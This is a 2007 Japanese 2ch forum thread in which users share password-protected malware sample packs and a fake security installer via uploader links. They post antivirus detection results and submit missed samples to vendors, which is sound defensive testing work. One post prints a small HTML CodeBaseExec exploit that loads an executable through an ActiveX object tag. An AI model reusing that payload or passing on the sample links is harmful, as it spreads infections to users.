まえ試したときはヒューリスティックのみで手動検査ができたから、いまも試せると思うけど。

769 :名無しさん@お腹いっぱい。:2007/09/09(日) 13:57:35
当たり前だが、P2Pで流通しているウイルスの検知率だと、
公式結果の検出率の半分か3分の1くらいに落ちるね。
やっぱりP2Pの世界は特殊だね。
世間で優秀なAVなら、nyでエロゲダウンしても検知しなければ大丈夫とか
複数のAVで検知しなかったから完璧と思ってるバカが世の中に多いから。
nyで実行ファイルダウンするのは自殺行為なのにね。

770 :758:2007/09/09(日) 14:07:04
>>746
 ? 1.文件名:4.exe
 ? 不是病毒
 ? 1.文件名:a.exe
 ? 不是病毒

771 :名無しさん@お腹いっぱい。:2007/09/09(日) 14:22:57
AntiVirが6.39.1.106で6.exeに対応。TR/Spy.Ruby.Kakkeys.Tとして検出。
土日だから他のは月曜かなあ。

772 :770:2007/09/09(日) 14:38:05
>>746
1.文件名:b.exe
不是病毒
1.文件名:5.exe
不是病毒

773 :名無しさん@お腹いっぱい。:2007/09/09(日) 16:34:26
みんなどうやってそんなにウイルスを手に入れてるの?
P2Pでエロゲーを落としてくればちょこちょこ入ってるものなの?

774 :名無しさん@お腹いっぱい。:2007/09/09(日) 17:55:47
乞食かw

775 :名無しさん@お腹いっぱい。:2007/09/09(日) 18:04:34
honeypot

776 :名無しさん@お腹いっぱい。:2007/09/09(日) 21:42:01
なんてな

777 :名無しさん@お腹いっぱい。:2007/09/10(月) 15:55:08
>>746
カスペ

b.exe

Hello.

Trojan.Win32.Shutdowner.bm

Detection for this malware has been added to the next antiviral bases update.


--
Regards, Alexey Malyshev
Virus analyst, Kaspersky Lab.

778 :名無しさん@お腹いっぱい。:2007/09/10(月) 16:07:04
>>746
消えてる><
もっかいあげてもらえませんか?

779 :名無しさん@お腹いっぱい。:2007/09/10(月) 16:33:42
>>778
ttp://www.dotup.org/uploda/www.dotup.org1624.rar.html
virus

何処のソフト使ってるのか教えてほしい。
 後、結果と


780 :772:2007/09/10(月) 16:48:55
>>746
   1.文件名:6.exe
   病毒名:Trojan.Win32.Agent.yer
   1.文件名:1.exe
   病毒名:Trojan.Clicker.Win32.Agent.agq
   2.文件名:c.exe
   病毒名:Trojan.Win32.KillFiles.mw
   3.文件名:d.exe
   病毒名:Harm.Win32.KillFiles.d
   4.文件名:e.exe
   病毒名:Harm.Win32.KillFiles.c

送ったのは以上

>>772と言われたが検出
5.exe
Trojan.Win32.Agent.yet
b.exe
Trojan.Win32.ShutDown.ew



781 :名無しさん@お腹いっぱい。:2007/09/10(月) 16:55:21
>>746
ちょ!Aviraから解析結果来たけれど
1.exeとb.exeはクリーンだと・・・

782 :名無しさん@お腹いっぱい。:2007/09/10(月) 18:20:52
ttp://www5.uploader.jp/dl/tane/tane_uljp00126.zip.html
pass: Malware-Pack

いろいろ詰め合わせ
McAfeeには提出済み

783 :名無しさん@お腹いっぱい。:2007/09/10(月) 18:38:03
>>782
AVG
C:\WINDOWS\デスクトップ\malware\4\ing.htm
Virus found JS/Downloader.Agent
C:\WINDOWS\デスクトップ\malware\9\k.exe
Trojan horse PSW.Lineage.ZB
C:\WINDOWS\デスクトップ\malware\a\tmp.htm
Virus found Exploit
C:\WINDOWS\デスクトップ\malware\b\chat.com
Trojan horse Generic7.JHY
C:\WINDOWS\デスクトップ\malware\e\VideoAccessCodecInstall.exe
Trojan horse Downloader.Zlob

残りは送りました

784 :名無しさん@お腹いっぱい。:2007/09/10(月) 18:52:59
ウイルスキラー
3\haha.js
Trojan.DL.JS.Agent.lmr
7\ad.htm
Trojan.DL.JS.Agent.lkx
9\k.exe>>packlz>>upx_c
Trojan.PSW.Win32.QMOnline.b

Risingに送りました

785 :名無しさん@お腹いっぱい。:2007/09/10(月) 18:55:38
>>782
お疲れ様です。
avast!に未検出ファイルを提出しておきました

786 :名無しさん@お腹いっぱい。:2007/09/10(月) 19:05:18
>>785
いや、そこはどれをなんて名前で検出したか書くとこだろ

787 :名無しさん@お腹いっぱい。:2007/09/10(月) 19:16:47
NODは2個しか検出しなかった上にえらいスキャンに時間がかかった
検出したのは9とbだけ

788 :名無しさん@お腹いっぱい。:2007/09/10(月) 20:03:46
>>782
カスペ7
5/14
(1、4,7,9、b)
スルー多い。
検体提出します。

detected: Trojan program Trojan-Downloader.JS.Agent.no File: 1/n404-1.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: 4/ing.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.ko File: 7/ad.htm
detected: Trojan program Trojan-PSW.Win32.OnLineGames.cdo File: 9/k.exe//BeRo//PE_Patch.UPX//UPX//PE_Patch.MaskPE
detected: Trojan program Trojan-PSW.Win32.Magania.zz File: b/chat.com//data.rar/2.sfx.exe//data.rar/2.exe

789 :名無しさん@お腹いっぱい。:2007/09/10(月) 20:22:38
>>782
Norton Internet Security2007
codec.exeをDownloaderとして検知
残りは贈っときます

790 :名無しさん@お腹いっぱい。:2007/09/10(月) 20:46:27
>>782
ウイルスバスター2007
codec.exe
TROJ_ZLOB.CYI

haha.js
JS_DLOADER.PSJ

k.exe
TROJ_SYSTEMHI.CT

VideoAccessCodecInstall.exe
TROJ_ZLOB.DSW

検出しなかったものを提出しました。

791 :名無しさん@お腹いっぱい。:2007/09/10(月) 21:12:40
>>782
カスペ6 2007/09/10 20:03:01

a tmp.htm
c file.exe
d file.exe
e VideoAccessCodecInstall.exe

以外検出

792 :791:2007/09/10(月) 21:28:47
訂正
カスペ6 - 2007/09/10 20:03:11

後、VideoAccessCodecInstall.exe は、一週間程観察してたけど、Genericパターンで対応できないソフトは検出できない。
バイナリが2時間毎に変わるので、検体を提出しても無意味。
今のところ、AVG、BitDefender、Microsoft、Sophos、Trend Micro しか検出できない。

793 :791:2007/09/10(月) 21:34:48
嗚呼、ゴミン。
カスペ6 >>788 と同じ(解凍中に中断してた……)。

794 :名無しさん@お腹いっぱい。:2007/09/10(月) 21:42:32
>>>746
カスペから遅い返事

5.exe
Hello !

This is a new variant of Trojan-Spy.Ruby.Kakkeys Detection will be added in next update.

Thank you !


カスペ7
11/14(うち2は白、待ちは1)

1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe Trojan-Spy.Ruby.Kakkeys
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe Trojan.Win32.Shutdowner.bm
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.ex

795 :名無しさん@お腹いっぱい。:2007/09/10(月) 22:22:04
ついでにこれもドゾー

http://www5.uploader.jp/dl/tane/tane_uljp00127.zip.html
pass NFL

http://www.f-secure.com/weblog/archives/archive-092007.html#00001273

これ NFLとかうちら関係ないけどアメリカ産ベンダ未対応が多いんで送ってやってや〜

796 :名無しさん@お腹いっぱい。:2007/09/10(月) 22:45:04
>795
ttp://www7.uploader.jp/dl/maru/maru_uljp00075.jpg.html
ttp://www7.uploader.jp/dl/maru/maru_uljp00076.jpg.html

orz

797 :名無しさん@お腹いっぱい。:2007/09/10(月) 22:45:27
>>795
AVG
Virus found Downloader.Tibs検出

798 :名無しさん@お腹いっぱい。:2007/09/10(月) 23:22:01
J-COM相模原4/7火病デビューログ 晒しage
欠陥商品ウイルスバスター擁護でフルボッコ

「500」「バスター厨」「相模原」粘着荒らし総合スレ
http://pc11.2ch.net/test/read.cgi/sec/1187859868/616-625/

799 :名無しさん@お腹いっぱい。:2007/09/10(月) 23:48:04
>>795
ノートン反応
Trojan.Packed.13

800 :名無しさん@お腹いっぱい。:2007/09/10(月) 23:55:11
これな
http://itpro.nikkeibp.co.jp/article/COLUMN/20070907/281405/?ST=security

Packed.13にはモルヒネつかわれてるようだ

801 :名無しさん@お腹いっぱい。:2007/09/11(火) 00:34:51
ttp://antispydownloads.org/mwb/downloads/1/mb_install.exe

日本人狙う偽セキュリティソフト「MalwareBurn」、ウェブルートが警告
ttp://internet.watch.impress.co.jp/cda/news/2007/09/10/16845.html

ttp://www.virustotal.com/resultado.html?a22d39e30430df9513e50ad577870221

Aviraに検体提出しました

802 :名無しさん@お腹いっぱい。:2007/09/11(火) 00:58:40
>>801
Symantecに通報済み

803 :788:2007/09/11(火) 01:07:12
>>782

カスペ 12/14 (14のうち、白1、回答待ち1)

追加検知検体

haha1.js_ - Trojan-Downloader.JS.Agent.ol
haha2.js_ - Trojan-Downloader.JS.Agent.ol,
vip.js_ - Trojan-Downloader.JS.Agent.ok
file.exe- Trojan.Win32.Agent.bar
file2.exe_ - Trojan-Downloader.Win32.Small.fqi
mp3 - Trojan-Downloader.JS.Agent.om
tmp.htm - Exploit.HTML.IESlice.x

問題なし?
codec.exe - No malicious software was found in the attached file.

回答待ち
VideoAccessCodecInstall.exe- 回答待ち

804 :名無しさん@お腹いっぱい。:2007/09/11(火) 01:13:38
Aviraうpデートできねー
検体送る気にもならんわ

805 :名無しさん@お腹いっぱい。:2007/09/11(火) 01:36:42
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.112

--> malware/1/n404-1.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Crypted.Gen
--> malware/2/codec.exe
[DETECTION] Contains detection pattern of the dropper DR/Agent.114628
--> malware/4/ing.htm
[DETECTION] Is the Trojan horse TR/Dldr.Agent.NV.6
--> malware/7/ad.htm
[DETECTION] Is the Trojan horse TR/Dldr.Psyme.KO.1
--> malware/9/k.exe
[DETECTION] Is the Trojan horse TR/Drop.Lineage.ACN
--> malware/a/tmp.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Dldr.Agen.AJ.8
--> malware/b/chat.com
[1] Archive type: RAR SFX (self extracting)
--> 2.sfx.exe
[2] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> malware/c/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/d/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/e/VideoAccessCodecInstall.exe
[DETECTION] Contains detection pattern of the dropper DR/Dldr.Zlob.AANT.1

未検出 0.3.5.6.8

806 :名無しさん@お腹いっぱい。:2007/09/11(火) 01:44:39
>>795
追加

--> tracker.exe
[DETECTION] Contains detection pattern of the worm WORM/Storm.tcn

807 :名無しさん@お腹いっぱい。:2007/09/11(火) 02:10:05
>>795
>>801
ウイルスバスター(CPR)でスルー
検体送付済み

808 :名無しさん@お腹いっぱい。:2007/09/11(火) 09:33:06
>>795
McAfee: ヽ(`Д´)ノ

WebImmuneに提出したら近いうちにTibs-Packedとして対応するらしい


>>801
スルーヽ(`Д´)ノ
でかすぎて送れねえヽ(`Д´)ノ

809 :名無しさん@お腹いっぱい。:2007/09/11(火) 12:08:48
>>808
>>801は7-zipで開くとMalwareBurn 7.1.exeで
1.53MBだと送れないかな?
MD5:
65E9A700AAD9E0CCD6EC82750E606346
SHA1:
AD764A0D3E835A34A384DDD90D8F4508304C36E9

810 :名無しさん@お腹いっぱい。:2007/09/11(火) 12:10:00
7-zipで開いてファイル毎に送るとかね。

811 :名無しさん@お腹いっぱい。:2007/09/11(火) 14:42:21
>>801
Avast(VPS774-1)は検出
Win32:Spycrush [Tool]

812 :名無しさん@お腹いっぱい。:2007/09/11(火) 15:17:16
>>801
ttp://www.virustotal.com/resultado.html?ed02e3b4ed2e0dfda4f7c329c630fa75
File mb_install.exe received on 09.11.2007 07:59:56 (CET)
Result: 3/31 (9.68%)

Avast    4.7.1043.0  2007.09.10  Win32:Spycrush
Kaspersky 4.0.2.24    2007.09.11  not-a-virus:FraudTool.Win32.MalwareBurn.a
Symantec 10      2007.09.11  MalwareBurn

File size: 3300227 bytes
MD5: b5c6857e91ab15aff90145d8701b4fd3
SHA1: e8c61d7870039ef42496d7addd7e3707faf366bf
packers: BINARYRES

813 :名無しさん@お腹いっぱい。:2007/09/11(火) 15:19:11
>>801
avast!対応済み。
http://www.crazyclits.com/?cgi-bin/tm3/1d4f97.jpg


814 :名無しさん@お腹いっぱい。:2007/09/11(火) 16:28:10
>>795
Rising
   1.文件名:tracker.exe
   病毒名:Rootkit.Win32.Agent.ngz

815 :名無しさん@お腹いっぱい。:2007/09/11(火) 22:15:32
>>813
氏ねよヴォケ!

816 :788=803:2007/09/12(水) 03:36:29
>>746
今返事北産業

カスペ7

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Wednesday, September 12, 2007 3:05 AM
Subject: RE: A New Malware? Please Inspect This File. [KLAB-2885407]

Hello,

VideoAccessCodecInstall.exe_ - Trojan-Downloader.Win32.Zlob.cmh

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

ちと時間がかかった。ザコルツヘブスキー君。Zlob

最初5/14→提出後12/14(2個は白〜1.exe, a.exe)

5/12=41.7% orz

817 :名無しさん@お腹いっぱい。:2007/09/12(水) 03:44:00
カスペ7
>>795
detected: riskware not-a-virus:FraudTool.Win32.MalwareBurn.a File: mb_install.exe//data0007

>>801
detected: virus Packed.Win32.Tibs.bt File:tane_uljp00127.zip/tracker.exe

818 :名無しさん@お腹いっぱい。:2007/09/12(水) 06:03:23
>>801
Avira検出
DR/FraudTool.MalwareBurn.A

819 :名無しさん@お腹いっぱい。:2007/09/12(水) 14:15:58
>>817
カスペGJ

820 :名無しさん@お腹いっぱい。:2007/09/12(水) 21:36:36
アンカーBJ

821 :名無しさん@お腹いっぱい。:2007/09/13(木) 18:24:30
http://www.dotup.org/uploda/www.dotup.org2988.zip.html
virus
山田とか騒がれてるが

822 :名無しさん@お腹いっぱい。:2007/09/13(木) 18:48:10
ただのjpgとgif詰め合わせの自己解凍書庫

823 :名無しさん@お腹いっぱい。:2007/09/13(木) 19:04:55
>>821
自分で解凍もできんのか?
見りゃウイルスじゃないことぐらい分かるだろが

824 :名無しさん@お腹いっぱい。:2007/09/15(土) 18:25:04
検体:>>746
カスペ7
4.exeについて一週間ぶりに返事キタ━━━━━━(゜∀゜)━━━━━━ !!。
でも、遅い。糞詰まりでも起こしているのか?ヽ(`Д´)ノウワァァン!!
-----------------------------------------------------------
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 15, 2007 1:26 PM
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871286]

Hello,
4.exe - Trojan-Spy.Ruby.Kakkeys.u
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.

---------------------------------------------------------
結論
5/14→12/14(うち2は白,。1.exeとa.exe)

2.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
3.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
4.exe Trojan-Spy.Ruby.Kakkeys.u
5.exe Trojan-Spy.Ruby.Kakkeys
6.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.t
7.exe : Trojan program Trojan.Win32.VB.aqk
8.exe : Trojan program Trojan.Win32.Delf.zu
9.exe : Trojan program Trojan.Win32.Delf.zu
b.exe Trojan.Win32.Shutdowner.bm
c.exe: Trojan program Trojan.Win32.Haradong.ar
d.exe: Trojan program Trojan.Win32.KillFiles.ki
e.exe: Trojan program Trojan.Win32.KillFiles.ki

825 :名無しさん@お腹いっぱい。:2007/09/15(土) 23:03:01
カスペ厨必死だなw

826 :名無しさん@お腹いっぱい。:2007/09/15(土) 23:04:26
出張すんな

827 :名無しさん@お腹いっぱい。:2007/09/15(土) 23:23:33
カスペは評判だけが先行して、
実は売れてないとか?

828 :名無しさん@お腹いっぱい。:2007/09/16(日) 00:24:21
>>827
Amazonランキング見てみな

829 :名無しさん@お腹いっぱい。:2007/09/16(日) 01:14:14
>>827
なんか中国でシェアNo1になるかもしれん勢いなんだとさ
知ったこっちゃねーがw
元々ゴミみたいなアンチウイルスがシェア上位を牛耳ってただけだしなw

830 :名無しさん@お腹いっぱい。:2007/09/16(日) 09:27:55
またNOD厨か

831 :名無しさん@お腹いっぱい。:2007/09/16(日) 09:53:51
>>829
中国のソフトウェア市場は9割が海賊版

832 :名無しさん@お腹いっぱい。:2007/09/16(日) 12:26:31
http://www5.uploader.jp/dl/tane/tane_uljp00132.zip.html
pass : folder

中身は .folderファイル

833 :名無しさん@お腹いっぱい。:2007/09/16(日) 12:59:55
>>832
カス7
Exploit.HTML.CodeBaseExec

834 :名無しさん@お腹いっぱい。:2007/09/16(日) 17:57:49

カス厨自演乙

835 :名無しさん@お腹いっぱい。:2007/09/16(日) 18:38:12
>>832
McAfeeスルーヽ(`Д´)ノ

836 :名無しさん@お腹いっぱい。:2007/09/16(日) 18:46:37
>>835
         ___
        /       ヽ
    , -‐ (_).⌒ l ̄| ⌒ | プギャーーー
     l_j_j_j と) ノ─|  ノ
    /   /       ヽ
    〈  ノ         |

837 :名無しさん@お腹いっぱい。:2007/09/16(日) 18:52:58
>>832

これの中身って
<html><head><title></title>
<object CLASSID='CLSID:4455A55A-5FF7-42A0-94C4-CEAD0F76F6F5' CODEBASE='img001.txt.exe'></object>
<script>window.location = "./";</script></head><body></body></html>
ってゆうhtmlみたいなんだけど、これってどんな実害あるの?

838 :名無しさん@お腹いっぱい。:2007/09/16(日) 19:01:04
>>832
F-Secure2008
Exploit.HTML.CodeBaseExec

839 :837:2007/09/16(日) 19:02:38
>>832
アンカーミスった。。。
つまりローカルだと「img001.txt.exe」ってゆうウィルス実体?ファイルが存在しないのに、
このhtmlをトロイダウンローダーとかって判定するのってなんかむちゃくちゃな気が。。。
潜在的に危険なhtmlってこと?おれなんか大きな勘違いしてる?

840 :名無しさん@お腹いっぱい。:2007/09/16(日) 19:24:33
>>832
ttp://www.virustotal.com/resultado.html?5bcd564677f6cf698ba7e8b1fc82c736
File virus.folder received on 09.16.2007 12:16:29 (CET)
Result: 5/32 (15.63%)

ClamAV   0.91.2     2007.09.16  Trojan.Downloader.HTML.Codebase-1
Fortinet   3.11.0.0    2007.09.16  HTML/CodeBaseExec.A!exploit
F-Secure  6.70.13030.0 2007.09.15  Exploit.HTML.CodeBaseExec
Ikarus    T3.1.1.12    2007.09.16  Exploit.HTML.CodeBaseExec
Kaspersky  4.0.2.24    2007.09.16  Exploit.HTML.CodeBaseExec

File size: 192 bytes
MD5: 3f66c020cda211770342071272571f1b
SHA1: de341e53a7ba3cf1e4e961aa77b63e63be12f470

841 :名無しさん@お腹いっぱい。:2007/09/16(日) 20:40:16
>>832
ノートン
\virus.folder This file is not malicious by itself. However, it may be used by a malicious program.

842 :名無しさん@お腹いっぱい。:2007/09/16(日) 20:46:53
これじゃねえの?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML%5FBAGLE%2EAC&VSect=P

843 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:06:24
783 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/09/16(日) 21:01:42
Norton2002とAntivirが同等の検出力とか言ってる人。
下のスレを一ヶ月以上チェックして詳細な報告レポートを作ってくれ。
Antivirスレで場違いなノートンの宣伝をするのなら、これくらいのことはしてもらいたい。

【気違い】検出可否報告スレ3【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1181834645/

844 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:10:23
一部のマルウェアの検出可否だけで判断するのは危険
AV ComparativesやVirus Bulletinのレポートを読む方が正確

845 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:19:20
つーことは二流三流のマルウェアにはノートン役立たずってことか
ストライクゾーン狭いんだな

846 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:23:06
>>845
ワールドワイドで確認されてるマルウェアが対象なんだから
ストライクゾーンは広すぎるくらい
馬鹿かお前はw

847 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:31:23
ということは
ワールドワイドの土俵の外はからっきし確定じゃん
井の中の蛙ストライクゾーンなんだね

848 :名無しさん@お腹いっぱい。:2007/09/16(日) 21:51:30
確かにそうだな
少なくとも俺のワールドワイドは一般のワールドワイド+このスレだしな

849 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:18:23
某ワールドワイド君のワールドワイドは向こう三軒両隣程度という見解でよさそうだw

850 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:28:42
井の中の蛙ってw
Winnyにしか興味のない奴こそ
井の中の蛙、大海を知らずというべきだろw

851 :↑ブツのネタ元知ってるみたいだYO www:2007/09/16(日) 22:37:09
そうなんだ知らなかったよ いやぁ 失敬失敬

852 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:43:39
問うに落ちず語るに落ちるw

853 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:45:32
AV ComparativesやVirus Bulletin引き合いに出したあげくが
ただの乞食かよw

854 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:46:30
なんかいつの間にかすごい勢いでwinny君は李下で冠を正してますな

855 :名無しさん@お腹いっぱい。:2007/09/16(日) 23:47:10
>>852-854
なんか乞食が顔真っ赤にしてるな

856 ::2007/09/16(日) 23:56:06
AV ComparativesやVirus Bulletinが大好きな乞食

857 :↑もしかして長考1時間:2007/09/16(日) 23:57:19
.

858 :名無しさん@お腹いっぱい。:2007/09/16(日) 23:59:03
>>856
おい 先に矢印使うなよ(^^;

859 ::2007/09/16(日) 23:59:05
AV ComparativesやVirus Bulletinが大好きな乞食

860 :859:2007/09/17(月) 00:03:56
>>858
レスタイミング悪すぎたな グダグダやw

861 :名無しさん@お腹いっぱい。:2007/09/17(月) 00:04:14
(^^;オレ流れ弾に撃たれてる気がするw

862 :名無しさん@お腹いっぱい。:2007/09/17(月) 00:18:22
AV ComparativesやVirus Bulletinが大好きな乞食のせいだな。

863 :名無しさん@お腹いっぱい。:2007/09/17(月) 00:42:24
>>832
VB2007
スルー。検体送信済み

864 :名無しさん@お腹いっぱい。:2007/09/17(月) 01:02:10
>>832
Antivirスルー(;´Д`)

865 :名無しさん@お腹いっぱい。:2007/09/17(月) 06:10:43
>832
乙です!!
NOD32未検出。
提出しておきました。

866 :名無しさん@お腹いっぱい。:2007/09/17(月) 21:16:50
>>832
AntiVir検出
Exp/HTML.CodeBaseExec.61

867 :名無しさん@お腹いっぱい。:2007/09/18(火) 19:10:39
ttp://www5.uploader.jp/dl/tane/tane_uljp00133.zip.html
Pass: Malware-Pack

いろいろ詰め合わせ
McAfeeには提出済み

868 :名無しさん@お腹いっぱい。:2007/09/18(火) 19:23:52
>>867
乙です
Norton Internet Security 2008
2体検出/12ファイル
1.vbs : W32.SillyFDC
ad.htm : Downloader
残りは贈っておきます

869 :名無しさん@お腹いっぱい。:2007/09/18(火) 19:41:04
>>867
ウイルスキラー
4\qq.htm
Trojan.DL.Script.JS.Agent.aa
5\ad.htm
Trojan.DL.Script.JS.Agent.lhf
9\cthaninkey.CAB>>MSINET.OCX
Trojan.PSW.Win32.LMir.yff
b\prviacy
Trojan.DL.Script.JS.Agent.af

870 :名無しさん@お腹いっぱい。:2007/09/18(火) 19:53:39
チンカスペ

0\index.htm : JS.Agent.nv
4\qq.htm : HTML.Small.h
5\ad.htm : JS.Psyme.kf

残りは送る気毛頭ありません

871 :名無しさん@お腹いっぱい。:2007/09/18(火) 22:35:27
>>867
ウイルスバスター2007
qq.htm JS_DLOADER.TTZ
他スルーなので検体提出

872 :名無しさん@お腹いっぱい。:2007/09/18(火) 23:23:28
>>867
AVG
0\INDEX.HTM
Virus found JS/Downloader.Agent

6\INDEX.HTM
Virus found JS/Downloader.Agent

7\WMV.HTM
Virus found JS/Downloader.Agent

8\JB.EXE
Trojan horse Generic3.TJI

C\1.VBS
Virus found VBS/Nadix

残りはスルーしたので検体送りました

873 :名無しさん@お腹いっぱい。:2007/09/19(水) 01:31:31
>>867
カスペ7

detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs

これから検体提出



874 :名無しさん@お腹いっぱい。:2007/09/19(水) 02:07:28
>>867

Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.147

--> Malware/4/qq.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Nomo.1
--> Malware/5/ad.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
--> Malware/6/index.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen
--> Malware/b/prviacy
[DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Agent.AA

う〜ん

875 :名無しさん@お腹いっぱい。:2007/09/19(水) 08:38:51
>>867

AVG IS

0 Virus found JS/Downloader.Agent
6 Virus found JS/Downloader.Agent
7 Virus found JS/Downloader.Agent
8 Trojan horse Generic3.TJI
b Not-A-Virus.Exploit.HTML.Mht
c Virus found VBS/Nadix

876 :869:2007/09/19(水) 11:43:45
9\cthaninkey.CAB>>MSINET.OCX
誤検出でした

877 :873:2007/09/19(水) 12:11:00
>>867
カスペ7
0と7は追加検出。カスペ判断ではゴミ多い。

detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.no File: tane_uljp00133.zip/Malware/6/index.htm
detected: Trojan program Trojan-Downloader.JS.Agent.qj File: tane_uljp00133.zip/Malware/7/wmv.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs

以下のファイルは、
No malicious software was found in the attached file.

1 ceshi,exe
2 errclean.exe
3 Setup.,exe
8.Jb.exe
9. cthaninkey.cab
a adnuke35.exe

878 :名無しさん@お腹いっぱい。:2007/09/19(水) 13:15:11
カスペ

879 :名無しさん@お腹いっぱい。:2007/09/19(水) 19:45:08
Stoned.Angelina
ttp://sunbeltblog.blogspot.com/2007/09/update-on-stoned-virus-infection-of.html

880 :名無しさん@お腹いっぱい。:2007/09/19(水) 19:57:18
現代のウイルス対策ソフト、過去のウイルスに対処できず
http://www.itmedia.co.jp/news/articles/0709/19/news036.html

正常に検出および削除ができたソフト
G Data (AVK) Total Care 2008
BitDefender Internet Security 2008 (v10)
Kaspersky Internet Security 7.0

検出できたが削除はできなかったソフト
BullGuard Internet Security 7.0
McAfee Internet Security 2007
Trend Micro PC-cillin Internet Security 2007
(ウイルスバスター 2007)
Avira AntiVir Personal Premium (v7)

検出および削除はできたが、その後 OS が起動できなくなってしまったソフト
Symantec Norton 360
Panda Internet Security 2008 (v12)

検出できなかったソフト
Microsoft OneCare 1.6

881 :名無しさん@お腹いっぱい。:2007/09/20(木) 00:57:32
Microsoft OneCareの存在意義を問いただしたい

882 :名無しさん@お腹いっぱい。:2007/09/20(木) 01:58:41
ttp://www5.uploader.jp/dl/tane/tane_uljp00134.zip.html
pass: msn
Messenger経由系(Live?)
ロンドン在住の友人よりこんにちわ

883 :名無しさん@お腹いっぱい。:2007/09/20(木) 02:19:43
>>882
ttp://www.virustotal.com/resultado.html?71410c215418ec3efb2451ae7d021532
File IMG09-18.jpeg-www.photoupload.com received on 09.19.2007 19:00:49 (CET)
Result: 11/32 (34.38%)

AntiVir           7.6.0.15     2007.09.19  Worm/LamerDetect.A
AVG             7.5.0.485    2007.09.19  Obfustat.PIZ
BitDefender        7.2        2007.09.19  Trojan.Agent.AFGC
CAT-QuickHeal      9.00       2007.09.19  I-Worm.LamerDetect.a
F-Secure          6.70.13030.0  2007.09.19  P2P-Worm.Win32.LamerDetect.a
Ikarus            T3.1.1.12     2007.09.19  Trojan-PWS.Win32.LdPinch.FI
Kaspersky         4.0.2.24     2007.09.19  P2P-Worm.Win32.LamerDetect.a
Prevx1           V2        2007.09.19  Worm.Ircbot.Gen
Sunbelt           2.2.907.0    2007.09.19  VIPRE.Suspicious
TheHacker         6.2.5.062    2007.09.19  W32/LamerDetect.a
Webwasher-Gateway   6.0.1       2007.09.19  Worm.LamerDetect.A

File size: 29429 bytes
MD5: 8aefba0f7dc85ef4ac95378388fae724
SHA1: 8b0475b1284a3d0bf385c8e6126083fafc0d4017
packers: PECRYPT
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=783ABC52F59B64A972E2005099BCD100F174E368
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

884 :名無しさん@お腹いっぱい。:2007/09/20(木) 03:18:55
>>882
ウイルスバスター 2007(CPR)スルー
検体提出しました

885 :名無しさん@お腹いっぱい。:2007/09/20(木) 07:53:13
NOD32だめだな。

886 :名無しさん@お腹いっぱい。:2007/09/20(木) 08:11:04
>882
